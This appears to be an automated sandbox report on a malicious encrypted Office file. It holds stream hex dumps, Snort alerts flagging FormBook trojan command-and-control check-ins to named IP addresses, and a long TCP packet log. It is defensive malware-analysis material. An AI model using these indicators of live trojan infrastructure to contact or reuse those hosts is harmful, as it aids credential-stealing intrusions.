Data ASCII:	S . ! . . . . . . . * . . . . . . . : S ( w . W 8 . . . ( ~ . / . W ^ . . E P P . . . U . # . . . a . W " T . . ] . . r . . d . & . . F . . 2 . I . # . . 8 . . . . 9 . ; ` . . I . # . . 8 . . . . 9 . ; ` . . I . # . . 8 . . . . 9 . ; ` . . I . # . . 8 . . . . 9 . ; ` . . I . # . . 8 . . . . 9 . ; ` . . I . # . . 8 . . . . 9 . ; ` . . I . # . . 8 . . . . 9 . ; ` . . I . # . . 8 . . . . 9 . ; ` . . I . # . . 8 . . . . 9 . ; ` . . I . # . . 8 . . . . 9 . ; ` . . I . # . . 8 . . . . 9 . ; ` . . I . # . . 8 . .
Data Raw:	53 ed 21 00 00 00 00 00 14 1e 2a d7 02 a8 15 ec d5 12 3a 53 28 77 e8 57 38 83 e0 b6 28 7e b5 2f ed 57 5e d9 03 45 50 50 06 bb 9b 55 fd 23 a8 e9 9f 61 d7 57 22 54 f4 a8 5d de 97 72 c7 9b 64 c4 26 cd 81 46 e3 ca 32 91 49 83 23 ef ca 38 e4 d0 eb 19 39 c8 3b 60 04 09 49 83 23 ef ca 38 e4 d0 eb 19 39 c8 3b 60 04 09 49 83 23 ef ca 38 e4 d0 eb 19 39 c8 3b 60 04 09 49 83 23 ef ca 38 e4 d0

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.5176249755
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . ` z X . . . . . . o . . . . . P # v L ; T % . . . . P . . . . . . . . . . T e ! 1 . . . . V . N < . ( e k . D . M - I . z . F . . .
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-11:35:49.175415	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49168	80	192.168.2.22	216.239.32.21
02/23/21-11:35:49.175415	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49168	80	192.168.2.22	216.239.32.21
02/23/21-11:35:49.175415	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49168	80	192.168.2.22	216.239.32.21
02/23/21-11:36:09.678212	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49169	80	192.168.2.22	34.102.136.180
02/23/21-11:36:09.678212	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49169	80	192.168.2.22	34.102.136.180
02/23/21-11:36:09.678212	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49169	80	192.168.2.22	34.102.136.180
02/23/21-11:36:09.818982	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49169	34.102.136.180	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 11:34:26.577325106 CET	49165	80	192.168.2.22	54.67.62.204
Feb 23, 2021 11:34:26.783643007 CET	80	49165	54.67.62.204	192.168.2.22
Feb 23, 2021 11:34:26.783752918 CET	49165	80	192.168.2.22	54.67.62.204
Feb 23, 2021 11:34:26.784049988 CET	49165	80	192.168.2.22	54.67.62.204
Feb 23, 2021 11:34:26.999011993 CET	80	49165	54.67.62.204	192.168.2.22
Feb 23, 2021 11:34:26.999068022 CET	80	49165	54.67.62.204	192.168.2.22
Feb 23, 2021 11:34:26.999314070 CET	49165	80	192.168.2.22	54.67.62.204
Feb 23, 2021 11:34:26.999453068 CET	49165	80	192.168.2.22	54.67.62.204
Feb 23, 2021 11:34:27.176362991 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.205174923 CET	80	49165	54.67.62.204	192.168.2.22
Feb 23, 2021 11:34:27.401114941 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.401374102 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.401906013 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.626671076 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.626698971 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.626710892 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.626724005 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.626735926 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.626749992 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.626765966 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.626781940 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.626797915 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.626813889 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.626877069 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.626929045 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.628151894 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.639472008 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.850655079 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.850724936 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.850769997 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.850801945 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.850811005 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.850836992 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.850842953 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.850855112 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.850873947 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.850897074 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.850902081 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.850949049 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.850964069 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.850994110 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.851018906 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.851032019 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.851032972 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.851073980 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.851103067 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.851114988 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.851120949 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.851155043 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.851181030 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.851192951 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.851197004 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.851238966 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.851264954 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.851288080 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.851294041 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.851331949 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.851350069 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.851376057 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.851402998 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.851444960 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.851511002 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.851553917 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:27.851581097 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.851602077 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:27.854111910 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.074953079 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.075016975 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.075231075 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.075752020 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.075793982 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.075834036 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.075872898 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.075885057 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.075905085 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.075911045 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.075922012 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.075928926 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.075965881 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.075982094 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076005936 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076021910 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076050043 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076081991 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076090097 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076107979 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076131105 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076155901 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076172113 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076191902 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076235056 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076252937 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076275110 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076298952 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076317072 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076323986 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076370955 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076380968 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076411009 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076440096 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076453924 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076483011 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076492071 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076493979 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076534033 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076560020 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076576948 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076577902 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076623917 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076637983 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076673031 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076682091 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076716900 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076731920 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076756954 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076776981 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076797962 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076801062 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076839924 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076857090 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076872110 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076879978 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076922894 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076941967 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.076961994 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.076989889 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.077002048 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.077008963 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.077054977 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.077069998 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.077095985 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.077111959 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.077136993 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.077142954 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.077178955 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.077193975 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.077219009 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.077238083 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.077286005 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.077682018 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.077745914 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.079132080 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.299442053 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.299509048 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.299540997 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.299582005 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.299694061 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.299745083 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.301346064 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301454067 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301501989 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301501989 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.301537037 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.301553965 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301583052 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.301600933 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301614046 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.301645994 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301680088 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.301687956 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301706076 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.301733017 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301769018 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.301774025 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301789999 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.301817894 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301856041 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.301862001 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301878929 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.301913023 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301930904 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.301959991 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.301989079 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.302001953 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.302012920 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.302076101 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.302324057 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.302968025 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303010941 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303055048 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303062916 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303076982 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303112030 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303143978 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303154945 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303160906 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303196907 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303232908 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303240061 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303251982 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303282022 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303317070 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303323984 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303338051 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303365946 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303368092 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303416967 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303447962 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303462029 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303479910 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303504944 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303522110 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303546906 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303580046 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303590059 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303607941 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303632021 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303663969 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303673983 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303692102 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303714037 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303714037 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303765059 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303797007 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303811073 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303812981 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303852081 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303889990 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303894997 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303921938 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303939104 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.303955078 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.303980112 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.304013014 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.304022074 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.304030895 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.304064989 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.304097891 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.304109097 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.304116011 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.304162025 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.304193020 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.304203033 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.304203987 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.304244041 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.304275036 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.304286003 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.305282116 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.307629108 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.523233891 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.523292065 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.523323059 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.523354053 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.523607969 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.525513887 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.525559902 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.525599003 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.525646925 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.525703907 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.525743008 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.526213884 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.526257992 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.526295900 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.526302099 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.526335001 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.526360035 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.526374102 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.526376009 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.526427984 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.526443958 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.526472092 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.526488066 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.526510954 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.526536942 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.526551008 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.526557922 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.526591063 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.526621103 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.526639938 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.527630091 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.529568911 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.529619932 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.529663086 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.529687881 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.529721975 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.529735088 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531014919 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531059980 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531100035 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531099081 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531122923 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531151056 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531153917 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531196117 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531224966 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531235933 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531260967 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531276941 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531292915 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531316042 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531320095 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531354904 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531392097 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531395912 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531411886 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531435966 CET	80	49166	180.214.238.131	192.168.2.22
Feb 23, 2021 11:34:28.531470060 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531482935 CET	49166	80	192.168.2.22	180.214.238.131
Feb 23, 2021 11:34:28.531483889 CET	80	49166	180.214.238.131	192.168.2.22
